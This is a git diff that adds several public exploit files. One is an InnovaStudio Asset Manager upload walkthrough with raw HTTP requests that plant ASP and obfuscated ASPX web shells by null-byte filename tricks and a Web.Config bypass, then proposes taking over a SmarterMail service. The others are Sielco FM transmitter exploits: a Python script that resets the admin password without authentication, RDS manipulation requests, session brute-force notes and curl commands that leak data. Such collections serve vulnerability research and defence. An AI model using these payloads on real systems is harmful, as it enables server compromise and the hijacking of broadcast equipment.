diff --git a/exploits/asp/webapps/51362.txt b/exploits/asp/webapps/51362.txt
new file mode 100644
index 000000000..586357f58
--- /dev/null
+++ b/exploits/asp/webapps/51362.txt
@@ -0,0 +1,330 @@
+# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal
+# Date: 11/04/2023
+# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
+# Vendor Homepage: innovastudio.com
+# Product: Asset Manager
+# Version: <= Asset Manager ASP Version 5.4
+# Tested on: Windows 10 and Windows Server 2019
+# CVE : 0DAY
+
+##################################################################################################
+# #
+# ASP version, in i_upload_object_FSO.asp, line 234 #
+# #
+# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
+# #
+##################################################################################################
+||==============================================================================||
+|| ((((1)))) ||
+|| ||
+|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
+||==============================================================================||
+##################################################################################################
+" "
+" FILE PERMISSIONS : [ 0644 ] "
+" "
+" DIR PERMISSIONS : [ 0755 ] "
+" "
+" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
+" "
+##################################################################################################
+
+==================================================================================================
+
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="shell.asp"
+Content-Type: application/octet-stream
+
+<%eval request("#11")%>
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+==================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
+" "
+==================================================================================================
+
+ ***
+
+||================================================================================||
+|| ((((2)))) ||
+|| ||
+|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
+|| ||
+||================================================================================||
+##################################################################################################
+" "
+" FILE PERMISSIONS : [ 0644 ] "
+" "
+" DIR PERMISSIONS : [ 0755 ] "
+" "
+" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
+" "
+##################################################################################################
+
+==================================================================================================
+
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
+Content-Type: application/octet-stream
+
+<%eval request("#11")%>
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+==================================================================================================
+" >>> filename="shell.asp%00asp.txt" <<< "
+" "
+" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode "
+" "
+" or "
+" "
+" CTRL+Shift+U "
+" "
+" SEND! "
+" "
+==================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" OK! "
+" "
+" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
+" "
+" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
+" "
+==================================================================================================
+
+ ***
+
+||==============================================================================||
+|| ((((3)))) ||
+|| ||
+|| ...:::NO WRITE PERMISSION!:::... ||
+|| ||
+|| ...:::Directory Traversal:::... ||
+|| ||
+||==============================================================================||
+##################################################################################################
+" "
+" FILE PERMISSIONS : [ 0600 ] "
+" "
+" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
+" "
+" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
+" "
+" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
+" "
+" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
+" "
+" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
+" "
+" "
+##################################################################################################
+##########################################################################################################################################################
+# #
+# What is the App_Data Folder useful? #
+# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
+# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
+# The App_Data folder is not public like the other website directories under the Home Directory. #
+# Because it's a private directory, the IIS server hides it for security reasons. #
+# Now, we will test whether such a directory exists. #
+# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. #
+# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
+# So the directory will be public and it will be able to respond to external queries and run a shell. #
+# #
+##########################################################################################################################################################
+==================================================================================================
+
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
+Content-Type: application/octet-stream
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+==================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" OK! "
+" "
+" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
+" "
+" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
+" "
+==================================================================================================
+# Now we will upload your shell to the directory where we made ByPass. #
+==================================================================================================
+POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
+Host: www.pentest.com
+Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
+Content-Length: 473
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://www.pentest.com
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpCurrFolder2"
+
+C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="inpFilter"
+
+
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
+Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
+Content-Type: application/octet-stream
+
+<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
+<%var PAY:String=
+Request["\x61\x62\x63\x64"];eval
+(PAY,"\x75\x6E\x73\x61"+
+"\x66\x65");%>
+------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
+
+======================================================================================================
+" ...[ RESPONCE ]... "
+" "
+" OK! "
+" "
+" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
+" "
+" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
+" "
+==========================================================================================================================================
+" "
+" So what can we do if no directory on the site has write permission? "
+" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
+" Sometimes this can be a mail service related vulnerability, "
+" Sometimes also it can be a "Service Permissions" vulnerability. "
+" Sometimes also it can be a "Binary Permissions " vulnerability. "
+" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
+" Sometimes also it can be a "Unquoted Service Path" vulnerability. "
+" Our limits are as much as our imagination... "
+" *** 0DAY *** "
+" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. "
+" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
+" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
+" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
+" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
+" And then upload our shell file to the server by bypassing it. "
+" This way, we will have full control over both the server and the mail service. "
+" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
+" "
+==========================================================================================================================================
\ No newline at end of file
diff --git a/exploits/hardware/remote/51366.txt b/exploits/hardware/remote/51366.txt
new file mode 100644
index 000000000..f93b255b0
--- /dev/null
+++ b/exploits/hardware/remote/51366.txt
@@ -0,0 +1,74 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51363.txt b/exploits/hardware/webapps/51363.txt
new file mode 100644
index 000000000..554a61ece
--- /dev/null
+++ b/exploits/hardware/webapps/51363.txt
@@ -0,0 +1,59 @@
+## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking
+## Exploit Author: LiquidWorm
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: 2.12 (EXC5000GX)
+ 2.12 (EXC120GX)
+ 2.11 (EXC300GX)
+ 2.10 (EXC1600GX)
+ 2.10 (EXC2000GX)
+ 2.08 (EXC1600GX)
+ 2.08 (EXC1000GX)
+ 2.07 (EXC3000GX)
+ 2.06 (EXC5000GX)
+ 1.7.7 (EXC30GT)
+ 1.7.4 (EXC300GT)
+ 1.7.4 (EXC100GT)
+ 1.7.4 (EXC5000GT)
+ 1.6.3 (EXC1000GT)
+ 1.5.4 (EXC120GT)
+
+Summary: Sielco designs and produces FM radio transmitters
+for professional broadcasting. The in-house laboratory develops
+standard and customised solutions to meet all needs. Whether
+digital or analogue, each product is studied to ensure reliability,
+resistance over time and a high standard of safety. Sielco
+transmitters are distributed throughout the world and serve
+many radios in Europe, South America, Africa, Oceania and China.
+
+Desc: The Cookie session ID 'id' is of an insufficient length and
+can be exploited by brute force, which may allow a remote attacker
+to obtain a valid session, bypass authentication and manipulate
+the transmitter.
+
+Tested on: lwIP/2.1.1
+ Web/3.0.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2023-5758
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php
+
+
+26.01.2023
+
+--
+
+
+# Session values (len=5)
+
+Cookie: id=44189
+Cookie: id=37692
+Cookie: id=+6638
+Cookie: id=+3077
+...
+...
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51364.txt b/exploits/hardware/webapps/51364.txt
new file mode 100644
index 000000000..d5b38de08
--- /dev/null
+++ b/exploits/hardware/webapps/51364.txt
@@ -0,0 +1,80 @@
+
+
+
+CSRF Add Admin:
+---------------
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51365.txt b/exploits/hardware/webapps/51365.txt
new file mode 100644
index 000000000..23f956afd
--- /dev/null
+++ b/exploits/hardware/webapps/51365.txt
@@ -0,0 +1,75 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51367.py b/exploits/hardware/webapps/51367.py
new file mode 100755
index 000000000..bf65c3ee4
--- /dev/null
+++ b/exploits/hardware/webapps/51367.py
@@ -0,0 +1,105 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
+## Exploit Author: LiquidWorm
+#
+#
+# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
+#
+#
+# Vendor: Sielco S.r.l
+# Product web page: https://www.sielco.org
+# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+# PolyEco1000 CPU:1.9.4 FPGA:10.19
+# PolyEco1000 CPU:1.9.3 FPGA:10.19
+# PolyEco500 CPU:1.7.0 FPGA:10.16
+# PolyEco300 CPU:2.0.2 FPGA:10.19
+# PolyEco300 CPU:2.0.0 FPGA:10.19
+#
+# Summary: PolyEco is the innovative family of high-end digital
+# FM transmitters of Sielco. They are especially suited as high
+# performance power system exciters or compact low-mid power
+# transmitters. The same cabinet may in fact be fitted with 50,
+# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+# 1000).
+#
+# All features can be controlled via the large touch-screen display
+# 4.3" or remotely. Many advanced features are inside by default
+# in the basic version such as: stereo and RDS encoder, audio
+# change-over, remote-control via LAN and SNMP, "FFT" spectral
+# analysis of the audio sources, SFN synchronization and much more.
+#
+# Desc: The application suffers from an authentication bypass and
+# account takeover/lockout vulnerability that can be triggered by
+# directly calling the users object and effectively modifying the
+# password of the two constants user/role (user/admin). This can
+# be exploited by an unauthenticated adversary by issuing a single
+# POST request to the vulnerable endpoint and gain unauthorized
+# access to the affected device with administrative privileges.
+#
+# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Macedonian Information Security Research and Development Laboratory
+# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+#
+#
+# Advisory ID: ZSL-2023-5769
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
+#
+#
+# 26.01.2023
+#
+#
+
+
+import requests
+print( '''
+ .- _ _ -.
+ / / \\ \\
+ ( ( (` (-o-) `) ) )
+ \ \_ ` -+- ` _/ /
+ `- -+- -`
+ -+-
+ -+-
+ -+-
+ -+-
+ -+-
+ -+-
+ / \\
+ *****************************************************
+ ! Sielco PolyEco Authentication Bypass Script !
+ *****************************************************
+
+ Please note that this script is for educational and
+ ethical purposes only. Using it for unauthorized
+ access or malicious activities is strictly prohibited
+ and can have serious legal and ethical consequences.
+ The responsibility of using this script in a lawful
+ and ethical manner lies solely with the user. The
+ author or creator of this script shall not be held
+ responsible for any unlawful or unethical activities
+ performed by the users.
+''' )
+url = input( ' Enter the URL (e.g. http://host:8090): ' )
+if not 'http' in url :
+ url = 'http://{}'.format( url )
+user = input( ' Enter the desired role (e.g. user or admin): ')
+if user not in [ 'user', 'admin' ] :
+ exit( ' Only \'user\' or \'admin\' please.' )
+password = input( ' Enter the desired password: ' )
+end = '/protect/users.htm'
+payload = {}
+if user == "user" :
+ payload[ 'pwd_admin' ] = ''
+ payload[ 'pwd_user' ] = password
+elif user == 'admin' :
+ payload[ 'pwd_admin' ] = password
+ payload[ 'pwd_user' ] = ''
+r = requests.post( url + end, data = payload )
+if r.status_code == 200 :
+ print( '\n MSG: OK.' )
+else:
+ print( '\n MSG: ERROR!' )
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51368.txt b/exploits/hardware/webapps/51368.txt
new file mode 100644
index 000000000..cf6aad443
--- /dev/null
+++ b/exploits/hardware/webapps/51368.txt
@@ -0,0 +1,88 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
+## Exploit Author: LiquidWorm
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: Improper access control occurs when the application provides
+direct access to objects based on user-supplied input. As a result
+of this vulnerability attackers can bypass authorization and access
+resources behind protected pages.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5768
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php
+
+
+26.01.2023
+
+--
+
+
+index.htm:
+----------
+54: function dologin() {
+55: var hash = hex_md5($('#password').val() + id);
+56: $.get('/login.cgi', {
+57: user: $('#user').val(),
+58: password: hash,
+59: id: id
+60: }).done(function (data) {
+61: var dati = $.parseXML(data);
+62: id = $(dati).find('id').text();
+63: user = $(dati).find('u').text();
+64: if (id == 0)
+65: window.location.href = '/index.htm';
+66: else {
+67: scriviCookie('polyeco', id, 180);
+68: if (user >= 3)
+69: window.location.href = '/protect/factory.htm';
+70: else
+71: window.location.href = '/protect/index.htm';
+72: }
+73: });
+74: }
+
+
+The function 'dologin()' in index.htm is called when a user submits a login form.
+It starts by calculating a hash of the user-entered password and a variable 'id'
+using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi'
+endpoint with the user's entered username, the calculated password hash and the
+'id' variable as parameters. If the request is successful, the function parses the
+XML data returned from the server, extracting the values of the 'id' and 'u' elements.
+Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects
+the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the
+value of 'id' and expires after 180 days.
+
+After that it checks the value of the 'user' variable, if it's greater than or equal
+to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the
+user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side
+JavaScript to always set the 'user' variable to a high value (4), or by tampering with
+the data sent to the server during the login process to change the value of the 'user'
+variable. It also works if the server's response variable 'user' is modified.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51369.txt b/exploits/hardware/webapps/51369.txt
new file mode 100644
index 000000000..8e3e65c94
--- /dev/null
+++ b/exploits/hardware/webapps/51369.txt
@@ -0,0 +1,118 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
+## Exploit Author: LiquidWorm
+
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: Improper access control occurs when the application provides
+direct access to objects based on user-supplied input. As a result
+of this vulnerability attackers can bypass authorization and access
+resources behind protected pages. The application interface allows
+users to perform certain actions via HTTP requests without performing
+any validity checks to verify the requests. This can be exploited
+to perform certain actions and manipulate the RDS text display.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5767
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php
+
+
+26.01.2023
+
+--
+
+
+POST /protect/rds.htm HTTP/1.1
+Host: RADIOFM
+
+rds_inta=1
+rds_intb=0
+rds_pi=381
+rds_ps=ZSL
+rds_rta=www.zeroscience.mk
+rds_rtb
+rds_rtt=0
+rds_tp=0
+rds_tp=1
+rds_ta=0
+rds_ms=0
+rds_pty=4
+rds_ptyn=
+rds_ecc=00
+rds_ct=0
+rds_level=90
+rds_psd=0
+rds_psd1
+rds_pst1=0
+rds_psd5
+rds_pst5=0
+rds_psd2
+rds_pst2=0
+rds_psd6
+rds_pst6=0
+rds_psd3
+rds_pst3=0
+rds_psd7
+rds_pst7=0
+rds_psd4
+rds_pst4=0
+rds_psd8
+rds_pst8=0
+rds_di_pty=0
+rds_di_cmp=0
+rds_di_cmp=1
+rds_di_st=0
+rds_di_art=0
+rds_di_art=1
+a0=90
+a1=9
+a2=26
+a3=115
+a4=0
+a5=0
+a6=0
+a7=0
+a8=0
+a9=0
+a10=0
+a11=0
+a12=0
+a13=0
+a14=0
+a15=0
+a16=0
+a17=0
+a18=0
+a19=0
+a20=0
+a21=0
+a22=0
+a23=0
+a24=0
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51370.txt b/exploits/hardware/webapps/51370.txt
new file mode 100644
index 000000000..5f093f6ab
--- /dev/null
+++ b/exploits/hardware/webapps/51370.txt
@@ -0,0 +1,67 @@
+## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
+## Exploit Author: LiquidWorm
+
+Vendor: Sielco S.r.l
+Product web page: https://www.sielco.org
+Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
+ PolyEco1000 CPU:1.9.4 FPGA:10.19
+ PolyEco1000 CPU:1.9.3 FPGA:10.19
+ PolyEco500 CPU:1.7.0 FPGA:10.16
+ PolyEco300 CPU:2.0.2 FPGA:10.19
+ PolyEco300 CPU:2.0.0 FPGA:10.19
+
+Summary: PolyEco is the innovative family of high-end digital
+FM transmitters of Sielco. They are especially suited as high
+performance power system exciters or compact low-mid power
+transmitters. The same cabinet may in fact be fitted with 50,
+100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
+1000).
+
+All features can be controlled via the large touch-screen display
+4.3" or remotely. Many advanced features are inside by default
+in the basic version such as: stereo and RDS encoder, audio
+change-over, remote-control via LAN and SNMP, "FFT" spectral
+analysis of the audio sources, SFN synchronization and much more.
+
+Desc: Sielco PolyEco is affected by an information disclosure
+vulnerability due to improper access control enforcement. An
+unauthenticated remote attacker can exploit this, via a specially
+crafted request to gain access to sensitive information.
+
+Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+Macedonian Information Security Research and Development Laboratory
+Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+
+
+Advisory ID: ZSL-2023-5766
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php
+
+
+26.01.2023
+
+--
+
+
+$ curl -s http://RADIOFM/factory.ssi
+$ curl -s http://RADIOFM/rds.ssi
+$ curl -s http://RADIOFM/ip.ssi
+$ curl -s http://RADIOFM/alarm.ssi
+$ curl -s http://RADIOFM/i2s.ssi
+$ curl -s http://RADIOFM/time.ssi
+$ curl -s http://RADIOFM/fft.ssi
+$ curl -s http://RADIOFM/info.ssi
+$ curl -s http://RADIOFM/status.ssi
+$ curl -s http://RADIOFM/statusx.ssi
+$ curl -s http://RADIOFM/audio.ssi
+$ curl -s http://RADIOFM/smtp.ssi
+$ curl -s http://RADIOFM/rf.ssi
+$ curl -s http://RADIOFM/rfa.ssi
+$ curl -s http://RADIOFM/ping.ssi
+$ curl -s http://RADIOFM/lan.ssi
+$ curl -s http://RADIOFM/kappa.ssi
+$ curl -s http://RADIOFM/dbrt.ssi
+$ curl -s http://RADIOFM/audiom.ssi
+$ curl -s http://RADIOFM/log.ssi
\ No newline at end of file
